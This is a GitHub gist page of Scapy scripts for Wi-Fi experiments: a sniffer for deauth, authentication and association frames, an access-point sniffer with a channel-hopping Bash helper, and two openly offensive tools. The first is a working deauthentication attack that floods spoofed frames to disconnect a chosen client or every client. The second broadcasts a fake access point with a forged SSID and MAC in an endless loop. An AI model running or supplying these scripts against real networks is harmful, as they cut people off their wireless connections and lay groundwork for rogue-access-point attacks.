Last active
May 12, 2017 05:42
-
-
Save VAD3R-95/5bf179b2f42d1b3f0a965214e8ce6cdf to your computer and use it in GitHub Desktop.
Scapy Experiments
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Sniffing to check auth, deauth and association requests on supplied interface | |
| # ----VAD3R----- | |
| # | |
| from scapy.all import * | |
| import sys | |
| intf = sys.argv[1] | |
| def Packet_Handler(pkt): | |
| if pkt.haslayer(Dot11Deauth): | |
| print pkt.sprintf("Deauth Found from AP [%Dot11.addr2%] Client[%Dot11.addr1%], Reason [%Dot11Deauth.reason%]") | |
| elif pkt.haslayer(Dot11Auth): | |
| print pkt.sprintf("Authentication Request from [%Dot11.addr1%] to AP [%Dot11.addr2%]") | |
| elif pkt.haslayer(Dot11AssoReq): | |
| print pkt.sprintf("Association Request from STA [%Dot11.addr1%], Client[%Dot11.addr2%], AP [%Dot11Elt.info%]") | |
| print pkt.sprintf("-----------------------------------------------------------------------") | |
| if __name__ == "__main__": | |
| if len(sys.argv) != 2: | |
| print ("\nUsage :python Check_deauth.py [wlan]") | |
| sys.exit(0) | |
| try: | |
| sniff(iface=intf, prn=Packet_Handler) | |
| except KeyboardInterrupt: | |
| sys.exit(1) | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Deauth attack on client | |
| # | |
| from scapy.all import * | |
| import sys | |
| if len(sys.argv) != 4: | |
| print ("\nUsage :python ./deauth_mac.py [client] [bssid] [count]") | |
| print ("+"*55) | |
| print ("\ndeaut_mac.py by VAD3R") | |
| sys.exit(0) | |
| # addr1 = dest mac address, spoof_(addr2 = source MAC address), adrr3 = MAC address of A.P. | |
| conf.iface='wlan0mon' | |
| pckt = None | |
| clien_to_packet = None | |
| client = sys.argv[1] | |
| bssid = sys.argv[2] | |
| count = int(sys.argv[3]) | |
| pckt = RadioTap()/Dot11(addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth() # deauth_packet | |
| client_to_packet = RadioTap()/Dot11(addr1=bssid,addr2=client,addr3=bssid)/Dot11Deauth() # spoof_source:client to AP | |
| # aireplay-ng sty;e bursts of 64 [code similar to radierSec blog] | |
| while count != 0: | |
| try: | |
| for i in range(64): | |
| # send packet | |
| sendp(pckt) | |
| # spoofing deauth frame from client to AP if target not A.P. | |
| if client != "FF:FF:FF:FF:FF:FF": | |
| # send spoof_packet | |
| sendp(client_to_packet) | |
| # If count was -1, this will be infinte loop | |
| count -= 1 | |
| except KeyboardInterrupt: | |
| break | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| ## Generate FakeSSID.... | |
| ## | |
| from scapy.all import * | |
| netSSID = 'VAD3R' | |
| iface = 'wlan0mon' | |
| # addr1= dest mac address, addr2= source MAC address, adrr3=MAC adrress of A.P. | |
| dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2='94:fe:22:a6:98:f7', addr3='94:fe:22:a6:98:f7') | |
| beacon = Dot11Beacon(cap='ESS+privacy') | |
| essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) | |
| rsn = Dot11Elt(ID='RSNinfo', info=( | |
| '\x01\x00' # RSN Version 1 | |
| '\x00\x0f\xac\x02' # Group Cipher Suite : 00-0f-ac TKIP | |
| '\x02\x00' # 2 Pairwise Cipher Suites (next two lines) | |
| '\x00\x0f\xac\x04' # AES Cipher | |
| '\x00\x0f\xac\x02' # TKIP Cipher | |
| '\x01\x00' # 1 Authentication Key Managemnet Suite (line below) | |
| '\x56\x41\x44\x33\x52' # Pre _shared Key | |
| '\x00\x00')) # RSN Capabilities (no extra) | |
| frame = RadioTap()/dot11/beacon/essid/rsn | |
| frame.show() | |
| print("\nHexDump of frame:") | |
| hexdump(frame) | |
| raw_input('\nENter\n') | |
| sendp(frame, iface=iface, inter=.1, loop=1) | |
| # based on 4ARMED blog post |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| #Usage ./sniffer.sh [wlan0mon] | |
| #+++----VAD3R-----+++ | |
| # 5 lines bash sniffer (with python) | |
| # with channel hopping (tweek as much as you like) ;-) | |
| # Keep both scripts in same directory (check with [iwlist frequency] to confirm) | |
| python mySniffer.py & | |
| for i in {1..13} | |
| do | |
| iwconfig $1 channel $i | |
| sleep 5s | |
| done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| #+++---VAD3R---++ | |
| from scapy.all import * | |
| intf = 'wlan0mon' | |
| def PacketHandler(pkt) : | |
| if pkt.haslayer(Dot11): | |
| if (pkt.type == 0 and pkt.subtype == 8) or (pkt.type == 0 and pkt.subtype == 5): | |
| channel = int(ord(pkt[Dot11Elt:3].info)) | |
| if pkt.addr2 not in ap_list : | |
| ap_list.append(pkt.addr2) | |
| print "Channel: %d AP MAC: %s with SSID: %s " %(channel, pkt.addr2, pkt.info) | |
| if __name__ == '__main__': | |
| ap_list = [] | |
| sniff(iface=intf, prn = PacketHandler) | |
| # inspired by sniffer in 10 lines of python | |
| # for channel hopping refer below bash script...... |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
My Scapy Scripts ( more to come)